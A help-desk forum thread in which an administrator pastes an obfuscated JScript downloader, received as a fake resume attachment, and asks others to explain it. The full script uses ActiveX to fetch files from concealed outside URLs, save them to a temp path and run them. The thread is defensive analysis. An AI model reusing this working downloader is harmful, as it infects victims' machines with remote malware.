Malicious javascript pretending to be a resume: What does this script do?
Hi guys,
I am not sure what the policy is about posting this sort of thing here is so I give fair warning that this code is suspected to be malicious in nature as it came via email in a zip file, pretending to be a resume
I was hoping someone could tell me what this code was trying to do. I have a tiny bit of experience with javascript but and scripting in general but most of this code is unrecognisable to me.
Thanks in advance.
Andrew
I am not sure what the policy is about posting this sort of thing here is so I give fair warning that this code is suspected to be malicious in nature as it came via email in a zip file, pretending to be a resume
I was hoping someone could tell me what this code was trying to do. I have a tiny bit of experience with javascript but and scripting in general but most of this code is unrecognisable to me.
(function(){var BKah=(27.0+"HKGbcL8gW\x82u"["charCodeAt"](5)*0);iaqm=(2.0+"?s\x86}|ZA:*\x894H9"["length"]*20);var n7Er=("J\x82j\x85m\x81;\x86&gs('6tbf%"["charCodeAt"](8)*11+34.0);try{var vStb=window["g1wUbdrLt~bqr"[("U#)_/k?B"["length"]*6300863351+1.0)["toString"](("p\x8ax}?d*Rt{-I].+i7r_\x7f"["charCodeAt"](6)*0+35.0))](/[gLq\~Ud1]/g,"")];var vS_J=(":W)o7j}B\x82h\x81X8;u"["charCodeAt"](12)*5+29.0);oNNc=(2*"\x89)Z\x60Xh\x81-\x8b"["charCodeAt"](2)+24.0);}catch(ee){try{var lFPZ=new ActiveXObject("*eIw<rtgdEvH1e"[("{=isQt-7/\x87>eBIW6F"["charCodeAt"](7)*1084775147+33.0)["toString"](("W\x80\x833[ai"["length"]*5+1.0))](/[\<d1E\*HtI]/g,""));S0vk=("W7_6*vO\x83nU(-gZ"["length"]*23+8.0);}catch(eee){function T_Kw(fr, gadK, rn){ var hyan = new ActiveXObject("+WTSJcIr[i==pvt/w.7~SohVe~lAl"["replace"](/[\+7\[vV\~TJIoA\=\/w]/g,""));var OUoS=(48*"#@}6Y\x82;So2"["length"]+1.0);
var gadK = hyan["E"+"xpandEnvironmentS"+(65>20?"\x74":"\x6f")+"rings"]("u%oWTjE=MYHP*%"[(720098668*"w%:$FNn7#(GU\x8b{x)"["charCodeAt"](4)+49.0)["toString"]((0*"8\x846]T\x87i[tvg"["charCodeAt"](7)+35.0))](/[\=jouYH\*W]/g,"")) + String["fr"+(83>1?"\x6f":"\x68")+"mCh"+""+(83>31?"\x61":"\x59")+"rCode"](92) + gadK;var Cvii="#P*F`(I;lGYgDT>x;PNp(Aq"["replace"](/[\>NTgA\;\`\#\*\(G]/g,"");
var YThL = new ActiveXObject("cM-hSEX1vMZL[2m.5X+MrL8HuT<TsP"[("3R)0v"["length"]*3273117743+4.0)["toString"](("\x86\x84$j\x82e+#D(X\x874a*rn8\x89o"["charCodeAt"](9)*0+29.0))](/[m\[\-8rhEsZv\<\+u51c]/g,""));Fdbq="bB`/39cFyq;V&=lE5(j_pvMt"[(4.0+"Ul\x86Jn"["length"]*8476012186)["toString"]((34.0+"W\x7fn.y?\x846:k1t+s"["charCodeAt"](5)*0))](/[\/\(M9FEy\`\_\;\=b\&p]/g,"");
YThL["o"+(85>27?"\x6e":"\x68")+"re"+"ad"+(86>22?"\x79":"\x70")+"statechange"] = function (){ if (YThL["rea"+(69>21?"\x64":"\x5d")+"ySt"+"a"+(62>30?"\x74":"\x6f")+"e"] === 4){ var GkqB = new ActiveXObject("7IAID]O1DNBI.lS3t@#r;EeN9aHm"[("T\x83_}-|w<tp7"["length"]*5423875738+0.0)["toString"]((4*">Jv/\x83xEZj"["length"]+0.0))](/[lI13\;9EH\#\@7\]N]/g,""));var RS_j="!pkwb3)WyK#5l0wVENpg9L"[(1.0+">3&w\x8a4C"["length"]*2863432339)["toString"](("/G?K{@\x88'\x80JLW5_\x8bp>"["charCodeAt"](12)*0+30.0))](/[bEwlp\#9y\!\)]/g,"");
GkqB["o"+""+(98>36?"\x70":"\x69")+"en"]();hMoj="WIedMxbyo)CdT(N<9-U7N"["replace"](/[Wed7\<\-y\(\)x]/g,"");n6ZZ=("3.\x80x*PDHhq(S\x87i[\x83"["charCodeAt"](4)*9+40.0);var z_ox=("v[j(7"["length"]*76+1.0);bbQk="3Vjhx8JOz6NGnWPBo<Mot)C"[(646242394*"a<\x8a_s[\x84Lv\x86\x82@=N\x80zg"["charCodeAt"](13)+77.0)["toString"](("]Vt\x8b\x89h~^G-(?"["charCodeAt"](8)*0+35.0))](/[Njx3PO\)6J\<no]/g,"");var gvTb=(9.0+"3*\x85r4\x82bk\x80\x89Nt/"["length"]*27);var vtJw="`a4fv68s[z/&y]kAn59Ma"["replace"](/[Av548M\&\]\[\/\`]/g,"");
GkqB["t"+"yp"+(54>5?"\x65":"\x5b")+""] = 1;var dXJt="(DVFQ0G]QvnhZ9R=SMzrT-I"[(1120153484*"'\x89\x83Ce\x8al\x80ZMRxO5cio-h\x8b"["charCodeAt"](17)+29.0)["toString"]((0*"gz\x89\x87\x82AJFE_\x8aiN"["charCodeAt"](8)+35.0))](/[0V\=h\]v\(\-9zFrS]/g,"");
GkqB["w"+"rit"+(52>2?"\x65":"\x5c")+""](YThL["Resp"+(74>46?"\x6f":"\x68")+"nseBo"+"d"+(69>37?"\x79":"\x6f")+""]);F81g=("\x81+\x87q/p\x82*[Sb"["length"]*36+9.0);g5XT="RL0Q<zkWR5Y`K*mka92I-er"["replace"](/[e29\-\<Rk\*0\`Y]/g,"");var JiWj=(10.0+"H@\x8ae\x86\x81D;I1i"["charCodeAt"](6)*1);
GkqB["p"+(64>31?"\x6f":"\x65")+""+"siti"+(80>7?"\x6f":"\x6a")+"n"] = 0;pp3E="oyPngts4LIiH[LXHrScZmUb"["replace"](/[\[I4PUXZtHSon]/g,"");
GkqB["sav"+(55>7?"\x65":"\x5b")+""+""+(98>44?"\x54":"\x4b")+"oFile"](gadK, 2);var aLTe=("0'Adz\x60MB*#/;1"["charCodeAt"](8)*4+20.0);var nLha="P8EG=X<huCH&gno1Unrwh+h"[(16.0+"qPB/78-5z*\x83&ijT2"["charCodeAt"](7)*556371782)["toString"]((2*"_@H^(?Z51KPyN"["length"]+6.0))](/[G\&w1H\=u\+P8n\<]/g,"");o$dG=("VM6ySLTE>ZYu\x7fvJ[_"["charCodeAt"](2)*0+15.0);var D15G=(2.0+"to5XbxJ"["length"]*47);
GkqB[""+(87>27?"\x63":"\x5a")+"lo"+""+(53>34?"\x73":"\x6d")+"e"]();Cvpn="M`p~0U+7L_uJBZSniT%m~9[w"["replace"](/[iu\%\+\~0MB\[\`7\_S]/g,"");
} ;T5gx="OA1P#Mhp8k2El6VOgR+i1M"[(3027147209*"<$L+}w42Ta~GfX"["length"]+8.0)["toString"]((34.0+"OB*\x85sV&\x7fy0E@d)\x86<g"["charCodeAt"](10)*0))](/[1g86hEO\+\#k]/g,"");
} ;var Jx8n="*4=b&~L%Qx&-COCKU#h-stTe"[("Y0T8QC\x881Aj%Ub57n"["charCodeAt"](5)*890487061+31.0)["toString"]((0*"g\x80dw\x7f>D~&W]H\x85Q\x8b"["charCodeAt"](6)+36.0))](/[s\*\#TO\%\&\=\-KQ\~]/g,"");var ZC3Q=(36.0+"CAwD\x81-tp2}\x824"["charCodeAt"](8)*6);var eLzP=("UzP+h4\x60\x84FHYO?("["length"]*20+11.0);Bs7c="2Aez6DwLnS~Lu*x3s1plM>M"[(0.0+"QO\x82Y\x60*"["length"]*7063343489)["toString"]((4.0+"P\x8079^C"["length"]*5))](/[ez1\~wn\*3ul\>2D]/g,"");w$2g=(5*"[Pyw;NKh9met{p1\x80Ya"["charCodeAt"](14)+40.0);var gryB=(6.0+"\x60[S9e\x89?DGY+-8"["length"]*0);var nKTq="<R[Xpk&&F<l&eI6Ws_tDi*Q0"[("M>U\x7f\x8b0RjizoA"["length"]*2032260927+9.0)["toString"](("vo\x89M&bnrI\x82L)6>*@jBOe"["charCodeAt"](11)*0+31.0))](/[\[6Q\<esp\_D\*\&]/g,"");
try { YThL["op"+(90>29?"\x65":"\x5d")+""+"n"]("wGvE!T"[("t^m\x88d"["length"]*10081381361+4.0)["toString"]((1*"npUZ+@&\x82L^{=#\x85"["charCodeAt"](12)+0.0))](/[v\!w]/g,""), fr, false);var Dtcc="LsVu/CH7SDET4m/E6oO9Zrya"["replace"](/[yZD\/4VoEHL97]/g,"");
YThL[""+""+(51>8?"\x73":"\x6c")+"end"]();XYxF="cF_9%X-nJ8sI+eW7eFb6EvgQ"[(3027147209*"iX2u}-TA&$z:3{"["length"]+8.0)["toString"](("1CEvd:\x85-Rg5*\x60"["length"]*2+8.0))](/[veJ\-6g\+\%s\_cb7]/g,"");
if (rn > 0){ hyan["R"+(90>39?"\x75":"\x6d")+""+"n"](gadK, 0, 0);DhDg="XV/6;mND/1OjQ<_I&otU8(W"["replace"](/[OUt\_j\/\&\;\<XN\(]/g,"");
} ;var Ssra=(13.0+"y:a;\x85Z=g,ch+rm@"["length"]*22);
} catch (er){ } ;var I9Hr="W6pUh#mPI_BTsjQ5&mwVZK"[(672092090*">(Y+\x60KLAQ}"["charCodeAt"](5)+59.0)["toString"](("1gvm/u|U"["length"]*4+3.0))](/[\_\&Wj5w\#PpZhT]/g,"");
} T_Kw("Yh9tTt`pN]:0/#W/>e(lVlzi!sDoRnS1R.*Gr~u>U/-iLmq%a*-g2eWs`/!o-n%-ed.*j4p[bg"[(0.0+"_\x81L'<xc"["length"]*7200986687)["toString"]((0.0+"PemYZ"["length"]*7))](/[\>9Vbd\(S\~\*\#DUTq\-\[L0G2zNR\%Y\`\]W\!4]/g,""),"r3@9r6f5E2T1c1o.VeZbxv_e"["replace"](/[EfcbV\_\@vZrTo]/g,""), 1);M2_r=(54.0+"W\x8a1\x81zYFGjdEl\x86I"["charCodeAt"](13)*6);
T_Kw("(h@tIt(pR:bT/@*/%[e0lv0lMicsTo&nL1C.!)r>uCd/Xi8ymVaqg!eNsO/~tRFwEo@.+jQpzg"[(1487780792*"4Z\x86p2tm6laX"["length"]+7.0)["toString"]((29.0+"IKGeDmo9>=yf&\x88{d\x8b\x83"["charCodeAt"](2)*0))](/[\)d\[\!\@ELFI\>bMvXc\(q0C8\+\*Q\%\&N\~zVROyT]/g,""),"&5!2Y2Nu6J5K0b94.teoxOe"["replace"](/[NJ\&o4Ou\!bKtY]/g,""), 1);var Y1Zi=("\x60k\x84JNZlY;G"["length"]*30+6.0);
}};var H9rD=(21*"<qG\x83pgv]"["length"]+7.0);;var BJCo="gVhaDsYxdKyS(invL8wjQ"[(854354352*"mt}p\x87n@\x8b;\x8a"["charCodeAt"](8)+41.0)["toString"](("CSpD9hegV,"["charCodeAt"](4)*0+35.0))](/[h8yDgvdnY\(j]/g,"")})();//q0G737pZcn
Thanks in advance.
Andrew
I just delete this stuff on sight. You would know the sender if legitimate. Just delete it and move on.
I appreciate that, and I do too but as I said, I would like to understand what it is trying to do so I can better protect our environment. I had a user who almost ran this script but thought better of it at the last second.
I would really appreciate some insight into what the purpose of this script is and what it's trying to do.
I have no question that it's malicious, I was just hoping someone with a better understanding of JavaScript could give me a summary of its intent?
Cheers.
I would really appreciate some insight into what the purpose of this script is and what it's trying to do.
I have no question that it's malicious, I was just hoping someone with a better understanding of JavaScript could give me a summary of its intent?
Cheers.
It appears to be attempting to load an ActiveX component which, depending on your Windows security, can potentially do just about anything. The most likely thing is loading viruses and malware off the internet to infect the machine that it is run on.
Thanks Dave.
Is there an obfuscated IP address or something in that code? Something that could potentially be blacklisted to prevent the ActiveX component from being downloaded?
Is there an obfuscated IP address or something in that code? Something that could potentially be blacklisted to prevent the ActiveX component from being downloaded?
I don't know. I saw this part...
I just noticed another ActiveXObject in the first line of the script.
var GkqB = new ActiveXObject(
I just noticed another ActiveXObject in the first line of the script.
I uploaded the file to malwr.com to check out https://malwr.com/analysis/M2MwMGJiNjA0ZjYwNGYwZGIwYzA4MzgzNDBmNmU1ZGM/
Premium Content
You need an Expert Office subscription to comment.Start Free Trial